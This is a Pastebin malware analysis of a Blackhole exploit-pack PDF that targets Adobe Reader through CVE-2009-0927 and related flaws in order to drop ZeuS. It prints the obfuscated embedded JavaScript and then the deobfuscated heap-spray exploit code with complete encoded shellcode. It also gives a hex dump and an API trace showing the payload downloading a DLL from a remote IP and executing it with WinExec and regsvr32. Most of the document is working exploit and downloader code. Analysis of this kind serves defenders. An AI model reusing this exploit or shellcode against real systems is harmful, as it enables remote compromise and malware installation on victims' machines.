Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- This is the PDF Malware to exploit PC with the Adobe getICon exploit/CVE-2009-0927
- This one is found in the blackhole exploit pack. to drop ZeuS malware chains.
- VT Analysis if in here:
- https://www.virustotal.com/file/33d0c165072c82b7696cf0b152abdd3e3b2134f5e6ba6fa4fb9da80ad4e1b6fc/analysis/1334855876/
- details analysis (can't use VT temporarily so I pasted it in here)
- =============================
- I found this sample here:
- ==============================
- --02:10:13-- hxxp://188.127.249.241/data/ap1.php?f=58
- => `ap1.php@f=58'
- Connecting to 188.127.249.241:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 16,488 (16K) [application/pdf]
- 100%[====================================>] 16,488 24.62K/s
- 02:10:15 (24.60 KB/s) - `ap1.php@f=58' saved [16488/16488]
- ==============
- Structure
- ==============
- %PDF-1.5
- %粤マモ
- 7 0 obj
- <</Count 1/Type/Pages/Kids「28 0 R]>>
- endobj
- 10 0 obj
- <</Creator(sli)/ModDate(D:20080817171147-07'00')/Company(Windjack Solutions, Inc.)/Title(al)>>
- endobj
- 21 0 obj
- <</Names 23 0 R/Outlines 1 0 R/Metadata 9 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups「]/OFF「]/Order「]>>/OCGs「27 0 R]>>/StructTreeRoot 11 0 R/Type/Catalog>>
- endobj
- 23 0 obj
- <</JavaScript 24 0 R/AP 8 0 R>>
- endobj
- 24 0 obj
- <</Names「78 0 R 76 0 R]>>
- endobj
- 25 0 obj
- <</S/JavaScript/JS 26 0 R>>
- endobj
- 26 0 obj
- <</Length 4/Filter「/FlateDecode]>>stream
- endstream
- endobj
- 28 0 obj
- <</CropBox「37 37 575 755]/Annots 29 0 R/Parent 7 0 R/StructParents 0/Contents 60 0 R/Rotate 90/MediaBox「0 0 612 792]/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/ProcSet「/PDF/Text/ImageC]/Properties<</MC0 27 0 R>>/ExtGState<</GS0 72 0 R>>>>/Type/Page>>
- endobj
- 59 0 obj
- 「/ICCBased 68 0 R]
- endobj
- 60 0 obj
- <</Length 4/Filter/FlateDecode/Type/Contents>>
- stream
- endstream
- endobj
- 76 0 obj
- <</S/JavaScript/JS(
- function test2\(\){v=ar「z];s=s+cc「v];}
- ar=「62,
- 61,22,68,19,37,69,67,24,43,75,75,69,67,14,41,66,58,69,67,24,38,14,41,69,67,70,38,66,58,69,67,66,59,43,58,69,67,43,43,38,14,69,67,75,58,41,2,69,67,58,2,24,62,69,67,24,62,43,2,69......
- ...and so on...........54,66,13,20,74,17,54,13,60,74,74];
- cc={q:"+,0kl:-oz@_C*\)fVAa&={ds.8DxSE]I「KtU2y'5qQci3|v n<>Gw'r\(mW149;jbhpMeug%7N/P}6"}.q;
- qq='12e'+'wqva!l';
- q=qq「2]+qq「5]+qq「6]+qq「8];
- try{loadXML\({}\);}catch\($\){
- b={v:{q:this}}.v.q;
- w={v:b「q]}.v;
- s=Array\(\);
- n={v:cc}.v;
- for\(i=0;i-3854<0;i++\){
- z=i;
- test2\(\);
- }
- w\(s\);
- }
- )>>
- endobj
- xref
- 0 12
- trailer
- <</Size 12
- /Root 21 0 R>>
- xref
- 0 0
- trailer
- <</Size 12/Prev 75626/XRefStm 416/Root 21 0 R>>
- startxref
- 78995
- %%EOF
- ===============================
- JAVASCRIPT DEOBFS
- ===============================
- bjsg = '
- %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
- %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
- %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
- %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
- %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
- %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
- %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
- %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
- %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
- %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
- %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
- %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
- %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
- %u7468%u7074%u2f3a%u312f%u3838%u312e%u3732%u322e%u3934%u322e%u3134%u772f%u702e%u7068%u663f
- %u353d%u2638%u3d65%u0033%u0000';
- function ezvr(ra, qy){
- while (ra.length * 2 < qy){
- ra += ra;
- }
- ra = ra.substring(0, qy
- /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var
- payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une
- scape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;
- for (var count = 0; count < count2; count ++ ){
- dkg「count」 = yarsp + payload;
- }
- var overflow = unescape('%u0c0c%u0c0c');
- while (overflow.length < 44952){
- overflow += overflow;
- }
- this .collabStore = Collab.collectEmailInfo({
- subj : '', msg : overflow
- }
- );
- }
- function printf(){
- nop = unescape('%u0A0A%u0A0A%u0A0A%u0A0A');
- var payload = unescape(bjsg);
- heapblock = nop + payload;
- bigblock = unescape('%u0A0A%u0A0A');
- headersize = 20;
- spray = headersize + heapblock.length;
- while (bigblock.length < spray){
- bigblock += bigblock;
- }
- fillblock = bigblock.substring(0, spray);
- block = bigblock.substring(0, bigblock.length - spray);
- while (block.length + spray < 0x40000){
- block = block + block + fillblock;
- }
- mem = new Array();
- for (i = 0; i < 1400; i ++ ){
- mem「i」 = block + heapblock;
- }
- var num =
- 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
- 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
- 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
- 88888888888888888888888888;
- util.printf('%45000f', num);
- }
- function geticon(){
- var arry = new Array();
- if (app.doc.Collab.getIcon){
- var payload = unescape(bjsg);
- var hWq500CN = payload.length * 2;
- var qy = 0x400000 - (hWq500CN + 0x38);
- var yarsp = unescape('%u9090%u9090');
- yarsp = ezvr(yarsp, qy);
- var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
- for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
- arry「vqcQD96y」 = yarsp + payload;
- }
- var tUMhNbGw = unescape('%09');
- while (tUMhNbGw.length < 0x4000){
- tUMhNbGw += tUMhNbGw;
- }
- tUMhNbGw = 'N.' + tUMhNbGw;
- app.doc.Collab.getIcon(tUMhNbGw);
- }
- }
- aPlugins = app.plugIns;
- var sv = parseInt(app.viewerVersion.toString().charAt(0));
- for (var i = 0; i < aPlugins.length; i ++ ){
- if (aPlugins「i」.name == 'EScript'){
- var lv = aPlugins「i」.version;
- }
- }
- if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
- geticon();
- }
- else if (lv == 7.1){
- printf();
- }
- else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
- bx();
- }
- else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
- function a(){
- util.printd('p@111111111111111111111111 : yyyy111', new Date());
- }
- var h = app.plugIns;
- for (var f = 0; f < h.length; f ++ ){
- if (h「f」.name == 'EScript'){
- var i = h「f」.version;
- }
- }
- if ((i > 8.12) && (i < 8.2)){
- c = new Array();
- var d = unescape('%u9090%u9090');
- var e = unescape(bjsg);
- while (d.length <= 0x8000){
- d += d;
- }
- d = d.substr(0, 0x8000 - e.length);
- for (f = 0; f < 2900; f ++ ){
- c「f」 = d + e;
- }
- a();
- a();
- try {
- this .media.newPlayer(null);
- }
- catch (e){
- }
- a();
- }
- }
- ===========================
- EXPLOIT CODE
- ===========================
- It is obviously CVE-2009-0927 (Adobe getIcon flaw)
- code:
- 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- ................................................
- .........and so on..............................
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
- 09
- =============================
- Shellcode
- =============================
- 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
- 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
- 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
- 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
- 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
- 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
- 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
- 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
- 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
- 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
- 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
- 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
- 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
- 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
- eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
- 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
- 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
- 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
- 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
- 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
- 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
- c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
- 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
- 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
- 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 31 38 38
- 2e 31 32 37 2e 32 34 39 2e 32 34 31 2f 77 2e 70
- 68 70 3f 66 3d 35 38 26 65 3d 33 00 00 00
- ===================
- Which means
- ===================
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248,
- [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0,
- szURL=hxxp://188.127.249.241/w.php?f=58&e=3,
- lpfnCB=0x0,
- szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
- 0x7c86250d kernel32.WinExec(
- lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(
- lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- ====================
- While downloaded:
- ====================
- --02:28:02-- hxxp://188.127.249.241/w.php?f=58
- => `w.php@f=58'
- Connecting to 188.127.249.241:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 0 [text/html]
- [ <=> ] 0 --.--K/s
- 02:28:02 (0.00 B/s) - `w.php@f=58' saved
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement